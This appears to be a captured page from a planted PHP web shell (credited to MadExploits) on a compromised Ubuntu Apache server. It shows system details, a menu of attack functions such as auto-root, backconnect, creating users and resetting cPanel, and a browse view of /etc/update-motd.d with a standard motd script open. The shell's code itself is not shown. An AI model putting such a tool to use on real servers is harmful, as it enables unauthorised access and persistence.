Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
update-motd.d /
[ HOME SHELL ]
Name
Size
Permission
Action
00-header
1.19
KB
-rwxr-xr-x
10-help-text
1.13
KB
-rwxr-xr-x
50-landscape-sysinfo
1.07
KB
-rwxr-xr-x
50-motd-news
4.91
KB
-rwxr-xr-x
85-fwupd
84
B
-rwxr-xr-x
90-updates-available
218
B
-rwxr-xr-x
91-contract-ua-esm-status
296
B
-rwxr-xr-x
91-release-upgrade
558
B
-rwxr-xr-x
92-unattended-upgrades
165
B
-rwxr-xr-x
95-hwe-eol
379
B
-rwxr-xr-x
97-overlayroot
111
B
-rwxr-xr-x
98-fsck-at-reboot
142
B
-rwxr-xr-x
98-reboot-required
144
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 50-landscape-sysinfo
#!/bin/sh # don't try refresh this more than once per minute # Due to cpu consumption and login delays (LP: #1893716) stamp="/var/lib/landscape/landscape-sysinfo.cache" NEED_UPDATE="FALSE" [ -z "$(find "$stamp" -newermt 'now-1 minutes' 2> /dev/null)" ] && NEED_UPDATE="TRUE" if [ "$NEED_UPDATE" = "TRUE" ]; then # pam_motd does not carry the environment [ -f /etc/default/locale ] && . /etc/default/locale export LANG cores=$(grep -c ^processor /proc/cpuinfo 2>/dev/null) [ "$cores" -eq "0" ] && cores=1 threshold="${cores:-1}.0" if [ $(echo "`cut -f1 -d ' ' /proc/loadavg` < $threshold" | bc) -eq 1 ]; then printf "\n System information as of %s\n\n%s\n" \ "$(/bin/date)" \ "$(/usr/bin/landscape-sysinfo)" \ > "$stamp" else # do not replace a formerly good result due to load if ! grep -q "System information as of" $stamp 2> /dev/null; then printf "\n System information disabled due to load higher than %s\n" "$threshold" > "$stamp" fi fi fi [ ! -r "$stamp" ] || cat "$stamp"
Close